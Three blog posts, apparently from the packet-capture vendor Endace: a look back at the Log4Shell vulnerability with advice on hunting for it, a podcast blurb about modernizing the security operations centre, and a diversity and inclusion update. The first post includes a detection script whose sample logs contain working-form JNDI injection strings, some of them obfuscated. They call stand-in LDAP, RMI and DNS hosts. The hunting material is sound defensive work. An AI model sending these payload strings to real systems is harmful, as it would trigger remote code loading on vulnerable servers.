Log4j 2: A Week Look Back

Original Entry by: Michael Morris

Do you know if you have been attacked?

By Michael Morris, Director of Global Business Development, Endace

Many organizations have been scrambling this week to search their networks for any use of Log4j 2 libraries and to patch the applications, systems, appliances and devices that might be using them. Lots of cycles are being spent contacting equipment and software vendors to determine whether their systems or applications are affected, and applying fixes and updates to stop potential compromises. The primary response for most security teams has been to apply patches and plug the holes.

But what exactly is the threat? The Apache Log4j 2 Java library has a remote code execution vulnerability (CVE-2021-44228), known as Log4Shell, that gives remote, unauthenticated attackers the ability to execute arbitrary code loaded from a malicious server with the privileges of the Log4j 2 process.

It is nicely illustrated in this diagram from the Swiss Government Computer Emergency Response Team:

[Diagram: Log4j 2 JNDI attack process, from https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/]

Any system with this vulnerability is now an entry point: an attacker can run code on it and then use that foothold to conduct any number of other nefarious activities.

I have been reading numerous articles and attending various seminars from threat intel teams, such as Palo Alto Networks Unit 42, that discuss the scale and severity of the risk this zero-day threat poses to organizations. There are several key takeaways I have learned.

First, because of the prevalence of this vulnerability, literally millions of systems are at risk. Second, because of the scale of attacks leveraging this vulnerability, there have already been several compromises and ransomware attacks. However, a lot of the threat actor activity to this point appears to be reconnaissance and the planting of additional malware that can be used later, after threat actors have obtained initial access to a network and the systems on it.

Our technology partner, Keysight Technologies, has been tracking honeypot activity that shows huge numbers of exploitation attempts, demonstrating how many threat actors are scanning the internet looking for vulnerable systems.

Industry-wide there are already a huge number of bots scanning the internet simply looking for openings. Key advice from threat intel teams is to immediately isolate any impacted servers as they are truly open backdoors to the rest of your infrastructure. There are numerous tools out there to scan your environment for Log4j 2 use.

Anywhere Log4j 2 is found, you need to isolate the system and investigate it for potential compromise. It's essential to put in place policies, rules and filters to monitor outbound traffic to unknown IP addresses. Apply filters and pay extra attention to common protocols such as LDAP, LDAPS, RMI and DNS: the JNDI lookup itself reaches the attacker's server over these protocols, and they are also being leveraged for lateral movement and reconnaissance. If you are unable to isolate potentially compromised systems, look for anomalous or unexpected traffic to and from them.

Of course, you should also ensure your IDSs and firewalls have updated rule sets for Log4j 2 so that you can detect or block any future attempts to infect your network. This needs to be done quickly so you can get on with the job of reviewing any damage that may already have been done.

If you're collecting network metadata in a SIEM such as Splunk or Elastic, the first place to start is to search all HTTP transactions for strings containing JNDI lookups. Our partner, Splunk, published a blog on how to do this here:

https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html

Once you have identified any JNDI calls, it’s critical to review the recorded network packet data to determine if any outgoing connections were made from potentially compromised servers.

EndaceProbes can capture weeks or months of packet data, allowing you to quickly review potential threats that may have occurred prior to the public announcement of the Log4j 2 vulnerability. Chris Greer published a very useful YouTube video on how to use Wireshark to identify and analyze a Log4j 2 attack. Well worth watching.

Once you have identified connections that contain the JNDI string, you can quickly examine any subsequent outgoing connections from the affected host to see whether it successfully contacted the malicious LDAP server and downloaded Java malware. Knowing whether this step did or did not happen will save your team many days of incident response and allow them to focus on the servers that have actually been compromised.
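As an added example (not from the original post or from Endace's own tooling), here is a Python sketch of the two-step hunt described above: first normalize and search access-log lines for JNDI lookup strings, including URL-encoded and nested-lookup obfuscations, then check whether the server that received the request made an outbound connection to the callback host. The log lines, server names and connection records are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample records: (server that received the request, access-log line).
# These are made-up examples, not real traffic.
ACCESS_LOG = [
    ("web01", '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.23:1389/a}"'),
    ("web01", '10.0.0.5 - - [10/Dec/2021:12:00:09 +0000] "GET /api HTTP/1.1" 200 "-" "${${lower:j}ndi:rmi://198.51.100.23:1099/x}"'),
    ("web02", '10.0.0.7 - - [10/Dec/2021:12:01:00 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"'),
    ("web03", '10.0.0.9 - - [10/Dec/2021:12:02:00 +0000] "GET /s?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fa%7D HTTP/1.1" 200 "-" "curl/7.79"'),
]

# Constructed outbound connection records from flow/packet metadata: (server, dest_host, dest_port).
OUTBOUND = [
    ("web01", "198.51.100.23", 1389),   # web01 reached the LDAP callback host: likely compromised
    ("web02", "203.0.113.10", 443),
]

LOOKUP = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^/:}\s]+)(?::(\d+))?", re.I)
# Lookups Log4j evaluates before the jndi lookup: ${lower:x}, ${upper:x} and ${anything:-x} all yield "x".
INNER = [re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I), re.compile(r"\$\{[^${}]*:-([^${}]*)\}")]

def normalize(s: str) -> str:
    """Undo URL encoding and the nested-lookup obfuscations above so a plain ${jndi: pattern surfaces."""
    for _ in range(3):                    # handles double-encoded requests
        s = unquote(s)
    for _ in range(5):                    # collapse nested lookups until the string stops changing
        new = s
        for rx in INNER:
            new = rx.sub(r"\1", new)
        if new == s:
            break
        s = new
    return s

def find_jndi_lookups(log):
    """Return (server, scheme, callback_host, callback_port) for each line containing a JNDI lookup."""
    hits = []
    for server, line in log:
        for m in LOOKUP.finditer(normalize(line)):
            scheme, host, port = m.group(1).lower(), m.group(2), m.group(3)
            hits.append((server, scheme, host, int(port) if port else None))
    return hits

def correlate(hits, outbound):
    """Flag hits where the receiving server later connected to the callback host (contact = likely compromise)."""
    conns = {(srv, host) for srv, host, _ in outbound}
    return [{"server": s, "scheme": sch, "callback": h, "port": p, "contacted": (s, h) in conns}
            for s, sch, h, p in hits]
```

A finding with contacted=True is the server to prioritize; a lookup string with no matching outbound connection is an attempt that most likely failed.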

Good luck with the Log4j 2 threat hunting! To learn more about how cost-effective and simple it can be to have an always-on network packet capture platform, integrated with the rest of your security tools, to help you search for Log4j 2 and other zero-day attacks, go to www.endace.com.


Endace Packet Forensics Files: Episode #31

Original Entry by: Michael Morris

Michael talks to Kamal Khlefat, Product Manager, LinkShadow

By Michael Morris, Director of Global Business Development, Endace

Modernizing the SOC is one of the latest trends cyber security teams are undertaking to stay current and on a level playing field against today's threat actors. Whether it is adapting simply to keep up with the volume of threats, or implementing AI and ML technologies to find and prevent more sophisticated threat vectors, SecOps teams need to improve and upgrade.

In this episode of the Endace Packet Forensics Files, I talk with seasoned SOC Director Kamal Khlefat, now Product Manager at LinkShadow, who shares his perspectives on the movement to modernize the SOC.

Kamal gives his insight into where most SOC teams are struggling and the gaps organizations have in their cybersecurity defenses. He shares some observations about what customers are doing to handle ever-increasing alert volumes and the fatigue analysts suffer in their relentless effort to investigate and troubleshoot every indicator of compromise. And, finally, Kamal highlights some of the differences he is seeing between various industry verticals like governments, financial, energy and retail.

Other episodes in the Secure Networks video/audio podcast series are available here.


Diversity and Inclusion at Endace

Original Entry by: Katrina Schollum

By Katrina Schollum, People Partner, Endace


Since we established our Diversity and Inclusion Committee earlier this year, we have been busy working to cement the importance of our Diversity and Inclusion program at Endace.

As a group, we have held regular discussions across our four focus areas: gender, ethnicity, generations and people with different abilities, to establish how we can achieve positive outcomes for people and the business, increase awareness and break down barriers. We are committed to community-led objectives that support and celebrate individuality and foster a sense of belonging for everyone. In this blog post we are pleased to share some of our progress.

Establishing Who We Are

It was important to us to understand who we are at Endace, and what is important to us as we shape our path forward.

We created anonymous reporting on gender, nationality and cultural ethnicity and were able to share the statistical data visually with the whole organisation, which we will continue to do as we track our changes over time. We can report we have at least 24 different nationalities within Endace and we are extremely proud of our very culturally diverse workplace.

One of our biggest pieces of work was an internal survey that sought specific input across our four key areas. The Committee invested a lot of effort into asking the right questions so we could understand where there was a lack of clarity, what areas we are doing well in and what areas need improvement. As a result, we were able to clarify our key messages and share them across the organisation via various channels, including workshops, promotional activity such as email newsletters and posters, and team meetings.

[Photo: Diwali decoration competition, winning entry]

We were also able to meet a popular request to celebrate key cultural events throughout the year, such as sharing Māori-themed food at our New Zealand offices to celebrate Matariki (which marks the beginning of the new year in the Māori lunar calendar). In addition, we celebrated Diwali with a global team competition to learn more about this festival of lights. We plan to promote and celebrate many more of these occasions on an ongoing basis, giving everyone at Endace an opportunity to learn more about the other cultures represented in the team.

These activities are all great examples of the success of our community-led approach. By seeking input from the entire team we better understand what’s important and where we can add value to our diversity and inclusion initiatives. Sometimes it is relatively simple things that can make a big difference.

Community Led Initiatives
[Photo: Marjo Montejo reflects on women in technology on International Women's Day]

Our Committee has put together a plan of strategic, measurable objectives from our group discussions. Some of the activities that have already been delivered include calendar events such as World Autism Awareness Day. We also highlighted International Women's Day by sharing photos and personal stories about what the day meant to our team, and about what it means to be a woman in the tech industry.

We also recently held Cultural Intelligence workshops that were attended by 79.5% of our organisation. The workshops gave us tools to improve our understanding of cultures other than our own and to break down barriers, supporting greater participation and integration and increasing the sense of belonging.

Recently, for Transgender Awareness Week, a member of our transgender community at Endace shared his story in a powerful interview with Sasha Blair, VP People & Legal, to answer some questions about the trans community and his experiences. The recording was shared internally and some fantastic feedback was received. Our ongoing conversations around gender have made a noticeable difference in using gender-neutral and inclusive language.

What’s Next?

Looking ahead, we have planned some thought-provoking activities to celebrate and support individuals. The immediate focus will be educating ourselves on Neurodiversity and understanding how it adds value to our business.

Neurodiversity in the tech sector has at times been overlooked but major tech organisations are making great strides in this area and we are keen to see how we can contribute to these initiatives too.

While change takes time, we will continue to celebrate what makes Endace unique and keep taking steps to ensure our team can strengthen their feeling of belonging, and feel their individual voices are heard, valued and respected. We anticipate that the more initiatives we implement in our organisation, the more positive outcomes we will observe. Our agenda will support an increasingly inclusive environment, and we look forward to sharing our progress.